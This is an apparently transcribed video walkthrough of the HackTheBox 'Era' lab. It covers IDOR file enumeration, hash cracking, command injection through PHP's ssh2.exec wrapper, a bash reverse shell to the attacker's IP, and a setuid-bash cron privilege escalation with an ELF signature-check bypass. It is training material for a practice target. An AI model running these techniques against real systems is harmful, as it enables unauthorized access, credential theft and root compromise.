HackTheBox - Era




Table of contents (13 segments)

Segment 1 (00:00 - 05:00)

What's going on YouTube, it's me doing Era from HackTheBox. It starts off with finding an FTP server and two web applications. One of the web applications has file upload and download functionality, and there's no permission check on the download. The only thing you need is the ID, so we brute force the ID and get two other documents: the signing keys, which come in handy for the root step, and also a backup of the website. The backup also has the database, which contains some credentials which we can use against the FTP server to discover a backup of the Apache config and the website. So as the code shows, there is some functionality around PHP wrappers. Looking at the Apache backup, we see the PHP ssh2 extension is installed, so you can use the ssh2 PHP wrapper to log into the box and run a command to get a reverse shell. The root step is around signing an ELF binary, but it's easier to show than explain. So let's just jump in. As always, going to run nmap: -sC for default scripts, -sV to enumerate versions, -vv for double verbose. This gives us things like the TTL. -oA to output all formats, put it in the nmap directory and call it era, and then the IP address, which is 10.10.11.79. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is FTP on port 21 and the banner is vsftpd version 3.0.5. We also have HTTP on port 80. It says it's nginx running on Ubuntu and is redirecting us over to era.htb. So let's go ahead and make sure this is in our hosts file. So sudo vi /etc/hosts. Then we can add 10.10.11.79 era.htb. Save that, and let's see, the first thing we could poke at is FTP. I know nmap's scripts will do anonymous authentication by default, but it's something I always just like checking. Right. So let's just do ftp 10.10.11.79. I actually don't have the client on my computer. Let's do sudo apt search ftp, and this may pop up a lot of things.
Let's see, is there anything that's obvious? ftp is like a client. Let's just try sudo apt install ftp. What does this do? Seems fine. So I'm going to install this and hopefully we will be able to just ftp into the server. There we go. I'm going to do anonymous. And it looks like it is going to fail. I know a lot of people always go to like searchsploit, things like that. It's not a bad habit to have, but off the top of my head, I know there haven't been many exploits in vsftpd for a very long time. For some reason, a lot of people see this banner and think it's going to be vulnerable because it was a very common vector in CTFs a long time ago, but that was like version 2.3.4. Generally when I see version three, I don't think of any exploit, and 2.3.4 was released like in 2011, which is like 14 years ago. So I'm not going to spend too much time looking for vulnerabilities. If I ran into a big roadblock, I may go revisit that idea, but I want to go take a look at the website. So if I go to era.htb, we get a page. If I click around, we've got services, about, portfolio, clients, team, contact, and the contact page. We do see a domain here. At this point we can run a gobuster. We can either look for hidden pages or we could look for virtual hosts. Right before we go for pages, we should try to identify what type of server this is. If I do index.html, we get the page. If we try like .php, we get a 404 not found. So I'm going to guess this is a static website. We could also look at the page source to see if anything sticks out, like things like WordPress, Drupal, things like that. But I don't really see too much here. I'm just going to go and run a gobuster, so we'll do a gobuster. Put it in virtual host mode, URL http://, and what was this? era.htb. The wordlist, SecLists discovery DNS, and I always like just using the subdomains top million. Paste this, and I want to say we have to add like a DNS flag or something. Let's see what the command options say.
We do -u, I guess we can try this. And let's see, it looks like it's working. So we're checking all these subdomains. We don't have a hit. Yeah. And it doesn't look like we'll get one. I remember there being something funky that they changed in the latest version of gobuster. I think it's this append domain flag. We see this is false. Let's just do that again. Let's see, is there something here? Append domain? Let's see. I think this is what we actually want. So let's add the --append-domain flag.

Segment 2 (05:00 - 10:00)

And let's see, I think without that it's just trying the wordlist as the whole virtual host. So when we add the append domain, it tries wordlist.the URL. So we get one domain. This is going to be file.era.htb. So without the append domain it was just trying a request against 'file'. When we add the append domain, it changes. Oh, let's go try file.era.htb. I think that should be default. I don't know why it isn't. Maybe it is in the latest. I haven't updated yet, but let's go ahead and add this to the hosts file. So we'll do file.era.htb. Save this. And let's go take a look at what this page is. So we can do file.era.htb. Let's do http://file.era.htb. And we get a page: Welcome to Era Storage. We have a few URLs. So if we click around, every one goes to a sign in page. And that is login.php. So we know we're on a PHP web server. We can also log in with security questions. So we have a username, mother's maiden name, pet, city. We could try like admin, a, b, c and see. If we log in, we get user not found. So we have a way to brute force potential users. So if we do like era.htb, we have to do http. Let's see, did we have usernames on this? There was a contact. Lancer chat, Katherine Mori, let's see. There's a support. We could try a few things if we wanted to. Maybe kmori as a username, a b c, user not found. Maybe just try Katherine, a b c, but kind of getting to a dead end here. One thing I would also try is seeing if this goes to like an API. There's normally sometimes like mass assignment type vulnerabilities. I may be classifying that wrong, but when you send a request in, if it goes to an API, this is much more likely. This looks like it may be hand-written PHP just based upon this, meaning there's no framework or anything involved, right? But a lot of times when you use like PHP frameworks, there'll be quote unquote smart ways to handle data. Right? And we're passing in username, answer1, answer2, answer3.
But maybe the framework will just accept other things. So if we did like id is equal to one, it may just accept that. And then we get a different error, probably the security questions are incorrect, but we're still getting user not found. So it's not vulnerable to that. But that's also something I always test for, is if we can change these parameters around. Maybe we don't need to know the username. We just change it and say, hey, look at the ID instead. We may get in, but let's go take a look at what else there is. I always like having something going on in the background, so I'm going to start a gobuster. I want to try to find hidden PHP scripts, so we'll do gobuster directory mode, the URL http://file.era.htb, wordlist SecLists discovery web-content raft-small-words.txt. And then I'm going to add the php extension. Let's see. I don't know why this failed. It's saying everything is a 200. Is that true? Let's just go turn Burp Suite off. Like this. It looks like every page does actually get treated as a 200. Let's turn Burp back on. I just want to look at this behavior, see the exact request. Intercept on, send it, Repeater. So if we do this, we get a 200 page. There is probably a thing to blacklist the length. Please exclude response length. At this point, I'd probably actually just use like ffuf or something like that, but let's go figure out how to do this in gobuster. Let's see, -xl, so we can add -xl, paste that length in, and there we go. We can start enumerating it. And we have a login.php, register.php, download. Download is redirecting us to login. There is a files. So let's go take a look at /files real quick to see what this looks like. So disable this header. We get a forbidden. Let's see. Let's try register.php. So let's go here, register. And it looks like we can create an account. Now there is one stupid thing about this box.

Segment 3 (10:00 - 15:00)

And it took me a pretty long time to realize what was happening, so I'm just going to say it. But if you register with the password 'password', it's not going to work because they did some anti SQL injection things. That is really silly, but it's just filtering out strings, and 'or' is part of a SQL statement. So if you set the word password and you register an account, it will remove that and your password will be passwd. But you won't know that. And you'll probably spend hours trying to figure that out. But that was annoying. I think I just put my password as 'a' and that worked. Awesome. So now we're logged into the website. Let's see what we can do. We can potentially reset security questions. And oddly enough it's asking me for a username. So I can just probably put any user I want. I'm kind of shocked it is asking the username. Upload files, manage files. So let's try upload files real quick. Let's just choose something. readme.license. That sounds great to upload. And we get this ID. So let's see. We know there was a files. So if we do this, files, let's put http there. We just uploaded readme dot, was it license or md? What did we actually upload? Refresh this page. Does it tell us what we uploaded? File was not uploaded. Manage, readme.license. So forbidden. Still. So we can't access this file directly. Okay, I was wondering if potentially, if we knew the file name, we could access it, but it does not look like that's the case. We could download it here. If we click this, it gives us a link, and it looks like it's downloading off of the web server. Right. So we do id=986 and dl is equal to true. And it looks like it gives us that download. Now I'm going to check for like an IDOR vulnerability, but we're just going to brute force all these numbers. Right. And the first thing I always like doing here, we can do the dl, that's fine, because it's true like that. There we go. It says we need authentication to hit this.
So let's just do a curl and paste this in. And we don't get a file. We get a... let's read it back. Yeah. Redirecting us to login, I think. Where is the redirect? Yeah. login.php. So we need to make sure when we brute force this, we pass in our cookie. And the easiest way to do this is just sending the whole request file to ffuf. So let's go over to the proxy. We can clear this, refresh, get a new one. Go to that tab, I'm going to copy to file. And I'm going to say, that's not actually what I want. We want this. Yeah. So let's copy the file. And I'm going to say download.request. And now here we have download.request. So I'm going to edit this. And then we're just going to put FUZZ in the parameter we want to fuzz, right. And this has everything with us: the PHP session ID, the user agent, things like that. Now you could just tell ffuf the cookie and then be done with it. But I always like just giving it the whole download request so it looks more like my browser is doing it. Things like this accept and user agent match up. So it just looks a little bit better. If I just passed in the straight cookie, then it would have ffuf's default user agent and that would definitely stand out. Maybe, what if like Cloudflare or something would block me? So, best practice, I like just using the request. So we give it the request of download. And because this is not HTTPS, we have to do request-proto http because it defaults to https. And then the wordlist, we're going to do this funky thing. We do the funky caret syntax, and this is going to run the command and then treat it as a file. So we'll say, let's see. We were at 900 something. So let's just find everything from 0 to 1000. And we want to, let's see, we'll do hide words 3161. Filter words. There we go. And we have two IDs, 54 and 150. We also have 986; 986 was the ID that we uploaded. So there's two files, 54 and 150. So let's see if we can download these. So if we know the file ID, does it let us download?
We are still on Burp Suite. So we can just disable that real quick. Looks like we can.

Segment 4 (15:00 - 20:00)

So we have site_backup.zip. Let's save that. And then what was the other one, 150 something, right? Oh, just 150. Awesome. And we got signing.zip. So let's save both of these and then we'll move, download site backup here. And the signing. See. Okay, I'm going to make a directory, say backup. And then we will unzip it, site backup. There we go. And it looks like we have all the files. Awesome. There is also a database. So that's going to be where I start. So let's do a sqlite on this. And we can say .schema. And this will give us the thing. So we have all the files. We have the users. So I'm going to just do select username, user password from users. And then we have a list of all the users and passwords. So let's go ahead and save this. And then I'm going to go over to the cracking box so we can start cracking this. This is just a box I have on my network. You can run hashcat on anything. I would recommend running it on the host, not a VM, because if you're on a VM, it's going to take a long time to crack anything. But let's do hashes. I'll call it era. I'll paste this in, and then I want to separate the usernames with a colon. That looks good. Save it. And let's do ./hashcat era hashes, then the wordlist will be rockyou. You run this, it'll probably tell us the hash collides with a few things. Actually, it's going to tell us, does it match anything? We have to add the --username flag to tell it we passed in usernames in this. So here we go. It's telling us it conflicts. And the most common one is probably going to be this bcrypt. I have no idea, like nothing indicating this is form CMS or e-commerce. I always just try the standard bcrypt first. That's maybe 3200, because that's what it's always been. I've never not shown that I had to choose that option. I don't know what software uses the other forms, but this is by far the most common. We get one cracked already, that is America. And then we get Mustang. Let's see, how long is this going to take?
Looking at it, we are, what percent are we? Are we probably going to finish by the time I'm done talking? Oh, no, we're nowhere near done. But those two cracked right away. I'm just going to end this, and then I'm going to do a --show to see how far along or what those counts went to. So if we do our show, we can see Eric had America and Yuri had Mustang. If we go back to the nmap results, there wasn't any SSH. We do have FTP, so we can try that real quick. So we'll do ftp 10.10.11.179, let's see. Do we have anything here? Do I have the wrong IP? That's the first, 79, not 179. Let's try Eric. Permission denied. Okay. Let's try Yuri, we get a password prompt, we can try Mustang, and then we get logged in. And there are two files. We have apache2.conf and php8.1. So let's get both of these. It failed to download it, but. php8.1 conf. Failed to open file. Maybe I have to change the mode, because I can definitely write in this directory. Make the ftp directory, mode. Let's just make sure my FTP program is not doing something stupid. Let's go to this, Yuri, Mustang. Let's see. Using binary to transfer files. That should be fine, but everything is... I don't know what the zeros mean. Failed to open file, mode ASCII, only supports stream. Something's definitely going on here. I think wget supports FTP. I'm just going to try something. Yuri, Mustang. This, slash, php8.1.conf.

Segment 5 (20:00 - 25:00)

No such file. I think I know what's going on. I think there are directories. I think I'm an idiot. The zero, that is, yeah, 4096 is the default size for a directory. Directory change successful. Well, we get them, mget star. This should download everything. So let's save all this. Let's go into the php. Do a dir. And there's a lot of files. Let's see, one thing sticks out. We have ssh, SSL, zip. So this is all like the shared libraries of PHP. I'm not going to download this all, but we'll take note that this is not standard. And it is one of those tough things to notice. Maybe we should have started with, like, looking at the source code before going into this, but it is what it is. Let's see. So this is the Apache config for file.era.htb. Nothing special there. Looking at this, let's see, one thing I like doing to view this: let's grep everything that doesn't have a comment, period. There we go. We can just see that file; that looks standard. We can do the same thing with the apache2 thing, if anything is interesting here. I don't see anything. And let's see, actually, I was wondering, grep files on this? Nope. When we were getting file.era.htb /files, remember we got an error message, 403 forbidden, on everything we tried. I was trying to see if there was any of that configured in this, because that may indicate like there's a .htaccess file or something. Then we could go, if we found a file disclosure vulnerability, we could go download that .htaccess, potentially get the password, and then that could be reused for something else. But I don't see anything there. So let's now turn our eyes over to the site backup. And looking at the files here, the thing that probably most stands out to me is going to be within the upload or download. If the upload is vulnerable, then we could potentially upload PHP files and hit code execution that way. So let's see, if header is set to a valid... That should be fine.
How are we uploading, or how are we choosing the file name? Let's see. Target directory is files. Error basename. Check for harmful patterns. So it's looking for a single quote or double quote, path extension. Select * from files. Let's see. Add file. Field. I do not see too much that stands out to me. I really just hate reading PHP code. There are so many weird functions here that make this not the most straightforward to read. move_uploaded_file, name, tmp_name, target file. I don't see anything, but also, let's see. I guess the biggest thing we test for is uploading a file with like a directory traversal, which we should have done before. Let's just try this real quick. So if we go back to upload file, we have readme.license. And I want to intercept this request. Proxy, intercept on, upload. And what we want to do is put a ../ here and upload this file. It looks like the upload worked. If we go to it, a download is ready.

Segment 6 (25:00 - 30:00)

Looks like we can download the file, and let's see. readme.license. Is this now on the root of the server? It is not. So it looks like it did not save readme.license. I'm guessing when it writes a file to /files, it's going to be like a UUID or something like that. But I'm not seeing that with a quick glance at the code. If we look at how downloads work, let's see. We have: if dl is equal to true, it sets these and then just does readfile. And then we have this thing: beta, currently only available to the admin. And we have this show is equal to true, session era user is equal to one. This is most likely going to be an admin check. And then it's letting us do this weird thing. We're looking for a colon-slash inside of format. And if it is there, we're doing fopen on it. So we're going to open the wrapper and then concatenate the file at the end of the wrapper. So it's essentially just looking for a PHP wrapper if we do this. So that would include, like the most common would be php://filter/convert.base64. That's going to be the most common thing it's used for. That's a PHP wrapper. So let's go ahead and see if we can become an admin. Right. If we go back to the database, it did tell us all the users. Right. We have this admin underscore, this unique name. I'm going to guess this is the admin. So let's go ahead and go back to our account. Let's see, we were logged in. We can just click Update Security Questions. I'm going to do admin with this unique qualifier. We'll set the questions a, b, c. If user exists, answers may have been updated. So let's now sign out. We signed out successfully. Log in with security questions, a, b, c, log in. And now we have become an admin. And we can see the two files here. So now what we want to do is test this wrapper theory thing, right. So I want to do it with a PHP session, or not PHP session, like the base64 wrapper. And we'll try to read /etc/passwd.
So we want to go and grab download.php, and I do 54 as the ID because we need the ID on it, or the ID needs to be valid, I should say. So we send this here. And then there were some extra parameters it wanted us to add. So we do show is equal to true. And what else do we need? Format. So we'll say format is equal to php://filter/convert.base64-encode/resource=/etc/passwd. And it says opening this, and it fails. So what we want to do is probably upload a file called passwd because it's going to add this at the end. If we do an ID that doesn't exist, let's just do one, we get like file not exist, right? Is it found? File not found. Right. So we have to do a valid ID, but we can give it any file name we want. So I'm going to upload a file. We can turn Burp Suite off for a second. And let's just do touch passwd. Go here, upload. Let's do htb, passwd. Let's upload it. And the ID is 8946. So again, the contents of the file doesn't matter. We're just using this ID because it pulls the name from the database and adds it to the very end of our query. Right. So now I'm going to just do resource is equal to /etc/. And we see, oh, it added files. That is annoying. files/passwd. So maybe we can't use this because it's always going to append files on it. But that's weird. Let's see. I wonder what would happen if we did...

Segment 7 (30:00 - 35:00)

Let's just try one last thing. Intercept is on, upload. Name, ./passwd. So it appends files./passwd. There's no way this is going to work. But we don't know if we don't try. File already exists. So I don't think we can really work around this. And even if we did, we're just reading source code. There are potentially other wrappers, and that's where the FTP came into play. If you looked at all the PHP modules, where's my FTP here? Right. We were in the PHP configuration directory and these are all the PHP modules that are installed, one of them being ssh2.so. And this is not a default one. We also have an FTP module. But if we go to Google, I'm going to turn Burp Suite off for this. Let's just Google this file name. And ssh2.so is a dynamic shared object for the PHP SSH connection. And this is going to enable the PHP wrapper, I believe. Let's see. How do we use this? Resource types. Here we go. So the whole like logic step here would be, if we look at this, let's see if we can find it real quick, right. So we go to download.php. We know, oh, we can do something with wrappers, including files. Wasn't really that helpful. So if we look at what other wrappers are involved, maybe if we just click here we have file, http, ftp, php, zlib, data, glob, phar, whatnot. Right. If I think this is an outdated version of PHP, meaning it's not version like beyond 8.1, so this would have to be multiple years old, I could probably just upload a phar file and then point the wrapper at the phar file and have it execute code. However, that's not really a thing anymore. Now, if this was using like Laravel, WordPress, things like that, there is a good chance we could get code execution, because how you get code execution with this phar wrapper nowadays is you have to create an object, and you have to reference that object in the code somewhere. But since this is all just PHP code, there are no objects we can just magically create.
So if we did a grep, let's say class, it would be, this is all HTML, right? We're not creating any PHP classes, which means there's no PHP objects. So phar deserialization is out of play, right? Expect, I've never seen this one on servers. And to be fair, I've never seen ssh2 on servers as well. But we saw that ssh2.so file. So this is most likely going to be installed. And if we look at it, we can say ssh2.exec, user, pass, URL and then a command. So let's go see if this can work. So let's go ahead and copy that. And let's see, go back here. Go to Repeater. And what we want to do is this, right, ssh2.exec. And then we had two credentials. Bear with me while I look for this. Yuri and Eric. I'm going to try Eric first, and we'll just see if we get any output. So we'll say Eric, password is America, 127.0.0.1. And then we do the command we want. So I'm just going to do a ping -c 1 for count. And I'm going to ping my box. So 10.10.14.8. And I'm doing pluses for spaces because a space is not URL compliant. You have to use pluses there. And now let's do sudo tcpdump -i tun0 -v icmp. So now we're looking for pings or ICMP traffic. We do this. It says opening resource ID three and we don't get anything. I'm going to add, let's see, let's do a semicolon like that, and we get a ping. So what happened here? We take that out, we get nothing.

Segment 8 (35:00 - 40:00)

We add the semicolon, we get something. So what's happening here is again the command is doing that concat. Right. If we go back here, it's doing this fopen to open the wrapper and then add the file on top of it. Right. So that command, oh, it's telling us right here: files/passwd. So without that semicolon, it's just treating this as part of it. So let's get rid of it again. Right. This ping is not working because this is not an IP address. So yeah. So now we have a way to get pings working. Let's now do a reverse shell. So I'm going to do bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that. We need these quotes. Then we also want to URL encode the ampersands, the and signs, because those are special characters. And then change the spaces to pluses. Do this. Okay. And then we also need to end this with a semicolon. So let's now try a nc -lvnp 9001. Run this and there we go. We have a shell. Awesome. So let's do python3 -c 'import pty; pty.spawn("/bin/bash")', stty raw -echo, foreground it, and then we can export TERM=xterm. And now this enables us to clear the screen. So the first thing I always check for is just general sudo rules. So we can do a sudo -l and see eric may not run sudo on era. We could also switch to potentially the other user. Let's see if he exists. I think the password is Mustang. It looks like it was sudo -l, Mustang. Yuri may not run it either. We could look at the two differences between these. If we look at Yuri, he's not in groups. Eric is in devs. So there is one special group. We can also look for everything, and look for other accounts on the box by doing a grep 'sh$'; that's going to search for every line that ends in sh, and almost every shell like bash, zsh, sh, they always end in sh. So that's why I do that. We do that against /etc/passwd. We see there's only two users, Eric and Yuri. Well, three if you want to include root. But let's go see what this devs group can do.
So I'm gonna just do a find / -group devs, and let's hide error messages with 2>/dev/null. So running this, we see there is this /opt/AV directory. So if we go in here, let's go check, and ls -la, we see there is a monitor file and then status.log. And it looks like we have read-write over this file because that is part of groups. And if I cat status.log, it looks like it is just running this. Right. So, 2004. So maybe every single minute it runs. So what I'm going to do is, let's create a shell. vi is not found. That is annoying. nano dev. That's going to show that as sh, we can say /bin/bash. Actually we don't want to show because this is being run by a cron. Right. So what I'm going to do is copy /bin/bash over to /tmp. And then we can do a chown root on this file. And then after that we can say chmod 4755. That's going to add the setuid bit to this, letting us use this bash program to switch over to the root user, so we can save that. And let's now copy this file over top of monitor. And we probably should have backed up monitor first. I just forgot to do that, but I think that is good. Right. So this is still having the permissions. We look at it, it looks like it's going to run our script. Let's see, what is the current time? It is 6:08. Tail status.log. We see an error. The first error is from objcopy, and this is like objdump. If you ran this on a file, it just dumps all the sections of a binary.

Segment 9 (40:00 - 45:00)

It's saying the file format is not recognized because it's just a text file. There's no like file segments of this or whatever it's called. And then we get an error message saying executable is not signed, tampering attempt detected, skipping. There are two ways we can proceed here, because of how the actual script is doing the detection. Is it being done properly? I'm going to show the intended way first, and then we'll go jump and do the unintended. The intended way is just to create a little file and sign it, right. And as part of the FTP we did download signing.zip. So let's just make the directory sign real quick. And then I'm going to unzip this signing.zip file. 7z, I forgot to do x to extract. And then we have the x509 thing to generate the key. And then the actual key itself. And this is going to be the signing key. And it looks like it has the public and private as well. So we have private key and certificate here. So it looks like it has both in this one file. Right. So if we just made our file and uploaded it, the signature would not match. We can do that real quick. Let's do, make shell.c. Let's see, let's include, what is it, the standard IO, like that. And then let's do a main. And let's see, we can do setuid zero and we have to set all the effective things. So we'll do setgid, seteuid, setegid. That should be right. So what this does: set our user and group to root, set our effective to root. And then we want to run a system command. So we're just going to do the same thing we did before, copy /bin/bash over to /tmp. We'll call it shell. And then let's do a chmod 4777. Or 4755, I think I did before; I don't know why that's my default thing, or do that. And then when we do it, let's just make sure the owner is root. So root, like that. There we go. And that should be good, right? Again, the reason we're doing this, instead of just like system bash, is because we're exploiting a cron job.
So if we just have this file drop us into a shell, well, we don't have access to that shell because it's being run by a cron. So we're just going to copy a shell over to the /tmp directory and then give it the setuid permission to let us exploit it. So if we do a gcc shell, let's call this exploit. I'm going to call it the right name instead of typing it. And let's just do a python3 http.server. Let's go over here. I think I can just wget, right, http://10.10.14.8:8000/exploit. It saved. We move exploit over top of monitor. The permissions, not by root anymore, or root devs. That should be fine. I probably should have done a copy command, but that is most likely fine. Let's do tail status.log. You see, no threats detected. We can do a -f and we'll get that update in a second. It's probably going to say signature does not match, right. So let's google elf sign binary. While that goes on, we see a GitHub repo. So let's go ahead and download this. There we go. objcopy, can't dump the text signature section, it doesn't exist. And then it says executable not signed. So if we go here, I think I can just make this libcrypto. I don't think we have all the libraries needed. This is gonna be a pain. Hopefully this works. If not, then we're gonna have to switch to Docker to build this, which I don't like doing. But we can. Let's see. Cannot open shared object file libcrypto.so.1.1? I bet that's just using a different version of SSL or something. Let's see.

Segment 10 (45:00 - 50:00)

Where is this error coming from? Let's try all this. This could be horrible. I probably... okay, let's just go ahead and start using Docker for this. So let's do a docker run with --rm, which will delete this when it's done, and I'm going to mount my current directory inside /mnt, and then let's run Ubuntu 20. I always like specifying a relatively old version of Ubuntu as my first choice, just because when you create a binary, if you're running a newer version of libc, it won't run on older versions of libc, but if you compile it on an old version of libc, it'll normally work on newer versions of libc. So now that we're in this container, let's go ahead and follow these instructions real quick. We'll probably want to do an apt update so that we can install these. Do this; it shouldn't take too long. Install, and I hope this has gcc by default. It does not: apt install gcc. There we go. We probably have to do make as well or something. I doubt it's just going to have Makefile support, but maybe it does. Once this is done, let's go into our /mnt directory. Type make: "Makefile not found". apt install make. It should work. There we go, it has now successfully compiled. Let's see, do this. What do we call this directory? I think we are in "sign". Then what was it? We can copy key.pem over to this, copy our exploit over to this, and we have elf-sign. We cannot open it; that's annoying, but we can run it here just fine. elf-sign. There we go. So, hash algorithm: I'm just gonna specify sha256 because that's the one that comes to mind first. And then, what was it? The .pem. Or do both. And then the ELF file was exploit; I'm going to call it monitor. I'm doing key.pem for both because we saw it had both a private and public key in it. Hopefully the program is smart enough to use it. Let's see. "Removing". It looks like it's signed it. Let's go here. Do we have a monitor thing? We do. If I do objdump on monitor... let's see, is it -D, capital D? Let's see. Sign. We'll see if this works.

Are we still listening on port 5000? See, I don't think we are. I've got to find my shell, though. This is tcpdump. sh. Here we go. So, python3 -m http.server. And we will do a... let's do a curl now: curl http://10.10.14.8:8000/monitor, and I'll call this "e" for now. Or do a cp e over top of monitor. And there we go. So now we have copied e on top of monitor, and this should be a signed file. If we look at the date, what time is it? :08. We probably just missed it, right? The status log: we don't have any threats. If I do an ls /tmp... oh, we do have a shell, so it may have actually run. ls -la shell. We have this. It is not setuid, which is surprising, right? Yeah, it's just 755. Did I do the chown afterwards? Let's take a look at this. Let's see, shell.c. We do see chown. This is stupid. What I did is I just forgot to put the file here.

Segment 11 (50:00 - 55:00)

So the chown command failed, and because it failed, the && only proceeds on a success. So that's why it didn't run. So now we have to redo everything, so we can just do gcc. So we'll call it exploit still. That is definitely the right one. So we can move exploit into this. And let's see if we can remove monitor. I'm just making sure this is the right one, so we can see the command we're running: the /tmp/shell command. That looks good. So let's see, what do we want to do now? We need to sign it. So we removed monitor; sign. It's now signed. Curl. We have to start the HTTP server. Copy it. ls -la on /tmp, and we're waiting for this to become setuid. If we look at the date, it is :25:20, so it's probably going to be about 40 seconds, right? Most likely. So let's just do a sleep 40. This, and I will resume the video when this is done. Okay, I have mentally counted 40 seconds and it is now done, and it's still not setuid. We should see a capital S there. We're definitely screwing something up. I bet it's the chmod command. Let's see. ls /tmp. It is owned by root:root. Did I not download the file? I'm just noticing. 404? Curl. strings monitor | grep chmod. strings e | grep chmod. I think I just copied the 404. Yes, I did, because this was not in the correct directory. Let's do a curl, cp, strings monitor | grep chmod. This is definitely the right one. We have the chown root /tmp/shell. So in hindsight we don't have to do this, because this is already owned by root:root, so the chown is not doing anything. If we look at /tmp... oh, it's already run. Awesome. So let's just do /tmp/shell. And there we go: the effective UID is root. So now we can just do cd /root and cat root.txt. So that is one way to do the box. There is a pretty funny unintended because it's not doing signature checking correctly. So let's see, I'm going to copy e. Let's just do it to the home directory and call it correct.bin. That should work.

So let's run a program called pspy. So let's do google.com, "pspy GitHub". And this is going to monitor new processes that get run on the box. It's something that's very, very handy to be running when you do these boxes and try to exploit crons, right? So let's go ahead and just get it. Sure, this directory is fine; I don't feel like moving it to a correct one. And let's go to the home directory. wget http://10.10.14.8:8000/pspy64, chmod +x on this

Segment 12 (55:00 - 60:00)

not with "www". There we go. And if we run this program, we will see the actual cron that gets run, that is checking the signature and doing everything, right? So it shouldn't take too long. I'm kind of surprised it's taking any time at all. I wonder if it kind of triggers when the file gets changed. Oh, there we go. Probably. So let's see: initiate monitoring. Do we have anything? Let's see: bash periodic status. So right here it's checking a certificate, I think, maybe. I think this is just testing if the certificate is valid. There's one command that's missing that I saw when I did this myself. But one of the indications right here is this grep. It's just looking for a string inside of the binary, I think. Oh, not the binary; this is probably going to be the .text_sig section. Let's see if there's any new input. objcopy. It did not find it this go-around, but the error message: there's objcopy, it can't dump the section. We're not seeing objcopy being... oh, there we go. Yeah, it gets around. So what it's doing here: it's dumping a section. It's dumping the .text_sig section, and this is what we used to sign the binary, and it's calling it text_sig_section.bin, and it's doing it out of the monitor binary. And then, if we look right here, I think we're just making sure that what it dumped is a certificate. And then this grep is just making sure the "Era Inc" string exists in the certificate. At no point do I see it actually doing any validation that the certificate is correct, right? Normally when you sign a binary, the certificate also includes some hash of that file; essentially that says the certificate is good for this binary. If the binary changes, then the certificate would no longer match. But because it's just using grep here, it doesn't look like it's actually performing the check, right? So let's go ahead and run this command, this objcopy. I can copy it real quick. Okay, so we can run this. And what that did was it created this text bin, right?

So let's see. This ELF binary signer... exploit is not a signed binary. So it's wget http://10.10.14.8:8000/exploit. So this .text_sig came from the monitor binary. What I'm going to do is use objcopy to add a section called .text_sig, and then we're going to give it the .text_sig section from the monitor binary, and we're going to add that to exploit. And that is it. So let's do /tmp/shell -p. Can I delete /tmp/shell? So it looks like I can, or some of it. So that doesn't exist anymore. I'm going to copy exploit over /opt/AV/periodic-checks/monitor. cp, and then ls -la /tmp. And this is going to exist probably within 60 seconds. And this is just because the program itself isn't really doing any checking, right? If we went back to the library where this ELF signer is, it does give us code that we can use to create our own thing to test, right? Or is that dynamic linking, generate keys? There should be a way. Remove. Let's see: binutils, elf-sign, readelf doing this, objdump. It's talking about the layout. Generate keys. This is what I want; I swear I saw something on their page

Segment 13 (60:00 - 62:00)

for validating. What if it's a test case? No. But we can see the shell was there. This is from that one binary. But we have to figure out a way to test the valid signature, because normally when you sign a file, you're signing it to say, hey, this is how you check the integrity of the file to make sure it hasn't been modified. Obviously, that's not happening. If we look at the initiate monitoring script, you can see the logic, or check. So yeah, it checks the organization, it checks an email, but it's not actually checking the signature versus the binary. And this is gonna be awkward; it's pretty much the end of the video. I was really expecting to be able to build something quickly to test the validity of the signature itself. I swear I saw something: we could import a library in C from this project, and it would give you a function that would test the signature, but I can't find it. Let's look at the issues and things like that. I was like, maybe it was an issue I had seen or came across, right? But if we look at all the closed issues, it's all in... I want to say this is maybe Chinese, but I can't read any of this. And I went to the repository. I was like, oh, there's a signer, there's a verify module. Oh, this is all a kernel module. Let's see: verify module, signer, sig verify. All this type of stuff appears to be kernel modules and things like that. So I don't really know the correct way to do this. It is a very, very niche thing, so I'm not going to spend too much time digging into it. But yeah, that is the video. I guess we found out why it was so easy to bypass by just taking the signature out of one and putting it on top of another binary, because there's no good way for this library to actually validate it without using the kernel module, which is a thing in itself. So, with that being said, that's gonna be the video. Take care, everyone, and see you all next time.